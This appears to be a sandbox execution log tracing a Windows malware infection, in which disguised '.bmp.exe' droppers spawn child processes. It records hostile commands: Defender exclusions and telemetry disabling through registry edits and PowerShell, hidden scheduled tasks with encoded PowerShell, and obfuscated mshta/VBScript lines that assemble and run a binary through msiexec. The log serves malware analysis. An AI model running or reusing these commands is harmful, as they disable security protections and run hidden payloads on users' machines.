C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"
8⤵
PID:6268

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
9⤵
PID:4368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
10⤵
PID:780

C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\wMIKZZJ.exe.exe"
8⤵
PID:4804

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Suo.ppam & ping -n 5 localhost
9⤵
PID:5788

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:5844

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:4684

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
11⤵
- Enumerates processes with tasklist
PID:5744

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
11⤵
PID:6212

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^mIKZUERRcdogxRWVUqrYiUvVLTbpecknKxaeazHqEtakMEgUAbPEdtHFkPhwiIPZyJEZnUCBarxeClouFCIFGHoFMNQDyGTVfaueqgcGVhkhKFrqGivEZpabBYhLrYvMlnNptyu$" Avvelenate.ppam
11⤵
PID:2844

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
11⤵
- Runs ping.exe
PID:8172

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Disconosci.exe.pif
Disconosci.exe.pif r
11⤵
PID:2616

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
10⤵
- Runs ping.exe
PID:3236

C:\Windows\SysWOW64\TapiUnattend.exe
TapiUnattend
9⤵
PID:6968

C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe"
8⤵
PID:6768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 452
9⤵
- Program crash
PID:6760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 804
9⤵
- Program crash
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 776
9⤵
- Program crash
PID:7400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 824
9⤵
- Program crash
PID:7972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1012
9⤵
- Program crash
PID:7660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1048
9⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:2196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1376
9⤵
- Program crash
PID:7724

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte.bmp.exe" & exit
9⤵
PID:5220

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte.bmp.exe" /f
10⤵
- Kills process with taskkill
PID:7920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 1324
9⤵
- Program crash
PID:7276

C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"
8⤵
PID:6696

C:\Users\Admin\AppData\Local\Temp\7zS9B07.tmp\Install.exe
.\Install.exe
9⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\7zSAD86.tmp\Install.exe
.\Install.exe /S /site_id "525403"
10⤵
PID:6580

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
11⤵
PID:6944

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
12⤵
PID:7452

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
13⤵
PID:8180

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
13⤵
PID:5532

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
11⤵
PID:7236

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
12⤵
PID:7816

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
13⤵
PID:7612

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
13⤵
PID:5940

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gRkHuUFMR" /SC once /ST 03:10:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
11⤵
- Creates scheduled task(s)
PID:7792

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gRkHuUFMR"
11⤵
PID:7368

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gRkHuUFMR"
11⤵
PID:5528

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bKqtUhAckstRmOkXqo" /SC once /ST 13:05:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GDRPYdOHWOMIRVQbw\bnDAWlqtvsqsVUM\FlNSNPI.exe\" hO /site_id 525403 /S" /V1 /F
11⤵
- Creates scheduled task(s)
PID:7652

C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\chrome.exe.exe"
8⤵
PID:4568

C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\AjyTbkN.exe.exe"
8⤵
PID:6300

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Camminato.xla & ping -n 5 localhost
9⤵
PID:4984

C:\Windows\SysWOW64\cmd.exe
cmd
10⤵
PID:6000

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
11⤵
- Enumerates processes with tasklist
PID:7872

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
11⤵
PID:4876

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^XufIWpJvRqjcIeFiHQtYxsuHNiySwUYnVemDyijdsqGlBBEcpYOSjQXFZIVPtQcWeNAGDwwADOHxLWykDKJryujytTDvkbkAEJiOwYSo$" Nemica.xla
11⤵
PID:7484

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Plasmare.exe.pif
Plasmare.exe.pif J
11⤵
PID:7204

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
11⤵
- Runs ping.exe
PID:7396

C:\Windows\SysWOW64\TapiUnattend.exe
TapiUnattend
9⤵
PID:4832

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
8⤵
PID:6616

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
9⤵
PID:6956

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
10⤵
PID:5200

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
11⤵
PID:7800

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
12⤵
PID:7924

C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
8⤵
PID:6628

C:\Users\Admin\AppData\Local\Temp\is-0SGIH.tmp\B2BCH2.exe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0SGIH.tmp\B2BCH2.exe.tmp" /SL5="$60236,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
9⤵
PID:5560

C:\Users\Admin\AppData\Local\Temp\is-4HPRI.tmp\djkdj778_______.exe
"C:\Users\Admin\AppData\Local\Temp\is-4HPRI.tmp\djkdj778_______.exe" /S /UID=91
10⤵
PID:7772

C:\Program Files\Windows Multimedia Platform\SQBZJPAESH\poweroff.exe
"C:\Program Files\Windows Multimedia Platform\SQBZJPAESH\poweroff.exe" /VERYSILENT
11⤵
PID:8080

C:\Users\Admin\AppData\Local\Temp\is-A6684.tmp\poweroff.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A6684.tmp\poweroff.tmp" /SL5="$4047E,490199,350720,C:\Program Files\Windows Multimedia Platform\SQBZJPAESH\poweroff.exe" /VERYSILENT
12⤵
PID:7540

C:\Program Files (x86)\powerOff\Power Off.exe
"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
13⤵
PID:7668

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe"
6⤵
PID:4184

C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\911.bmp.exe" -hq
7⤵
PID:3832

C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Fenix.bmp.exe"
6⤵
- Checks computer location settings
PID:4452

C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\wam_3.bmp.exe"
6⤵
PID:3368

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~2.EXE
7⤵
PID:3288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
8⤵
- Blocklisted process makes network request
PID:4676

C:\Users\Admin\AppData\Local\Temp\Ygvpfvtkjpbhrqwcbakelpadportable_4_9_82.exe
"C:\Users\Admin\AppData\Local\Temp\Ygvpfvtkjpbhrqwcbakelpadportable_4_9_82.exe"
8⤵
PID:4580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA1AA==
9⤵
PID:7624

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
8⤵
PID:3128

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
6⤵
PID:5424

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
7⤵
PID:5024

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
8⤵
PID:4148

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
9⤵
PID:6472

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\DDDBX.cpL",
10⤵
PID:6584

C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\bezon.bmp.exe"
6⤵
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5000 -s 1532
7⤵
- Program crash
PID:7416

C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Bandicam.bmp.exe"
6⤵
PID:4744

C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\00.bmp.exe"
6⤵
PID:5436

C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe"
6⤵
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 456
7⤵
- Program crash
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 764
7⤵
- Program crash
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 772
7⤵
- Program crash
PID:5908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 792
7⤵
- Program crash
PID:6512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 804
7⤵
- Program crash
PID:6912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 984
7⤵
- Program crash
PID:824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1012
7⤵
- Program crash
PID:7092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1372
7⤵
- Program crash
PID:7092

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Mixruzki1.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\Mixruzki1.bmp.exe" & exit
7⤵
PID:7188

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Mixruzki1.bmp.exe" /f
8⤵
- Kills process with taskkill
PID:2296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1488
7⤵
- Program crash
PID:7568

C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\6523.exe.exe"
6⤵
PID:216

C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\d6cc75213b4f19cbc07bb687f4b12dcc.exe.exe"
6⤵
PID:5932

C:\Program Files (x86)\Installoid\installoid.exe
"C:\Program Files (x86)\Installoid\installoid.exe"
7⤵
PID:4668

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
8⤵
PID:5944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
9⤵
PID:4540

C:\Windows\system32\cmd.exe
/C powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
7⤵
PID:4216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Installoid'
8⤵
PID:4784

C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"
6⤵
PID:4080

C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\TrdngAnr6339.exe.exe"
7⤵
PID:4444

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5748

C:\Users\Admin\AppData\Local\Temp\DA2KD610K7C5090.exe
8⤵
- Loads dropped DLL
PID:3952

C:\Users\Admin\AppData\Local\Temp\C2JAI2314AAAKHL.exe
8⤵
PID:6444

C:\Users\Admin\AppData\Local\Temp\54HJAC1DI38KD56.exe
8⤵
PID:2260

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed189277fa467071b4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2424

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exe
Wed189277fa467071b4.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4208

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exe
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exe
6⤵
PID:5416

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exe
C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189277fa467071b4.exe
6⤵
- Executes dropped EXE
PID:5588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed18b39e5016b09c0.exe
4⤵
PID:532

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b39e5016b09c0.exe
Wed18b39e5016b09c0.exe
5⤵
- Executes dropped EXE
PID:4356

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed18bc651a8ec.exe
4⤵
PID:1492

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18bc651a8ec.exe
Wed18bc651a8ec.exe
5⤵
- Executes dropped EXE
PID:4440

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed183acbd9650c5ba88.exe
4⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe
Wed183acbd9650c5ba88.exe
5⤵
- Executes dropped EXE
PID:4452

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScrIpT: CloSE( CrEATeobjeCt ( "wScRIpT.SHeLL" ). Run ("cMD.EXE /r cOpy /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe"" ..\VIeEVfFWG.eXE && StArT ..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF & iF """" == """" for %O iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe"" ) do taskkill /f -Im ""%~NXO"" " ,0 , tRUe ) )
6⤵
- Checks computer location settings
PID:4628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r cOpy /Y "C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe" ..\VIeEVfFWG.eXE && StArT ..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF & iF ""== "" for %O iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed183acbd9650c5ba88.exe" ) do taskkill /f -Im "%~NXO"
7⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE
..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF
8⤵
- Executes dropped EXE
- Checks computer location settings
PID:5604

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScrIpT: CloSE( CrEATeobjeCt ( "wScRIpT.SHeLL" ). Run ("cMD.EXE /r cOpy /Y ""C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE"" ..\VIeEVfFWG.eXE && StArT ..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF & iF ""/Pn~NEdj1Yvwq4Z5P9cDcAtnF "" == """" for %O iN ( ""C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE"" ) do taskkill /f -Im ""%~NXO"" " ,0 , tRUe ) )
9⤵
PID:5844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r cOpy /Y "C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE" ..\VIeEVfFWG.eXE && StArT ..\VIeEVfFWG.exe /Pn~NEdj1Yvwq4Z5P9cDcAtnF & iF "/Pn~NEdj1Yvwq4Z5P9cDcAtnF "== "" for %O iN ( "C:\Users\Admin\AppData\Local\Temp\VIeEVfFWG.eXE" ) do taskkill /f -Im "%~NXO"
10⤵
PID:6068

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScript: CLoSe(CrEaTEObJeCt ( "wscriPT.shELL" ).ruN ("C:\Windows\system32\cmd.exe /q /R ECho | sET /P = ""MZ"" >_3C2lN.C30 & coPY /B /Y _3C2LN.C30 +G3GZ.J~ + L6PlIZD.LO + KKjk_39e._P + UK4KLvfF.YHX +MHXm.C +T7Y700Y.bI ..\KOoD.6SV & dEl /q *& StART msiexec -Y ..\kOoD.6Sv " , 0 , trUe ) )
9⤵
PID:2448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /R ECho | sET /P = "MZ" >_3C2lN.C30 & coPY /B /Y _3C2LN.C30+G3GZ.J~+ L6PlIZD.LO + KKjk_39e._P+ UK4KLvfF.YHX +MHXm.C+T7Y700Y.bI ..\KOoD.6SV & dEl /q *& StART msiexec -Y ..\kOoD.6Sv
10⤵
PID:6100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
11⤵
PID:5152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>_3C2lN.C30"
11⤵
PID:3896

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\kOoD.6Sv
11⤵
PID:5492

C:\Windows\SysWOW64\taskkill.exe
taskkill /f -Im "Wed183acbd9650c5ba88.exe"
8⤵
- Kills process with taskkill
PID:6048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed189a2b3ffdf4e59.exe
4⤵
PID:3384

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe
Wed189a2b3ffdf4e59.exe
5⤵
PID:4512

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF """" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
6⤵
PID:4232

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "" == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed189a2b3ffdf4e59.exe" ) do taskkill /Im "%~Nxs" -f
7⤵
PID:4372

C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE
..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k
8⤵
- Executes dropped EXE
- Checks computer location settings
PID:5552

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCript: clOse ( CrEATeObJeCt ( "WscrIpT.sHELl" ). rUn ( "cmd /Q /C copy /y ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ..\z1HFJkPKWMLYRf.EXE && StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k & IF ""-pVmK5OY1Q2FwiV3_NJROp~tX8k "" == """" for %s iN ( ""C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE"" ) do taskkill /Im ""%~Nxs"" -f " , 0,TRUE) )
9⤵
PID:5748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C copy /y "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ..\z1HFJkPKWMLYRf.EXE&& StArt ..\Z1hFJKPKWMLYRf.eXE -pVmK5OY1Q2FwiV3_NJROp~tX8k &IF "-pVmK5OY1Q2FwiV3_NJROp~tX8k " == "" for %s iN ( "C:\Users\Admin\AppData\Local\Temp\z1HFJkPKWMLYRf.EXE" ) do taskkill /Im "%~Nxs" -f
10⤵
PID:5968

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBsCrIpt: closE ( crEateOBjECT ("WsCRipT.sHELl" ).ruN( "cmD.Exe /r EchO | SEt /P = ""MZ"" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB + V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q * " ,0 , TRUE ) )
9⤵
PID:4800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /r EchO | SEt /P = "MZ" > OoZ39QP7.Q~P &cOPy /Y /b OOZ39QP7.q~P + 3_PI.f2x +6TWz8s9B.~T +TiRWH.Ql +FFUU.A1+ YZA~WMAU.H+ FDHTx.pBB+ V16YA.kU ..\WGKZNZ9t.jOX & StArT msiexec.exe -y ..\WgKZNZ9T.JOX & deL /Q *
10⤵
PID:5024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>OoZ39QP7.Q~P"
11⤵
PID:4284

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EchO "
11⤵
PID:4820

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y ..\WgKZNZ9T.JOX
11⤵
PID:5748

C:\Windows\SysWOW64\taskkill.exe
taskkill /Im "Wed189a2b3ffdf4e59.exe" -f
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Wed18b44c8630.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2476

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe
Wed18b44c8630.exe
5⤵
- Executes dropped EXE
PID:4264

C:\Users\Admin\AppData\Local\Temp\is-NQT9E.tmp\Wed18b44c8630.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NQT9E.tmp\Wed18b44c8630.tmp" /SL5="$50058,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
PID:4808

C:\Users\Admin\AppData\Local\Temp\7zS4BABCD76\Wed18b44c8630.exe
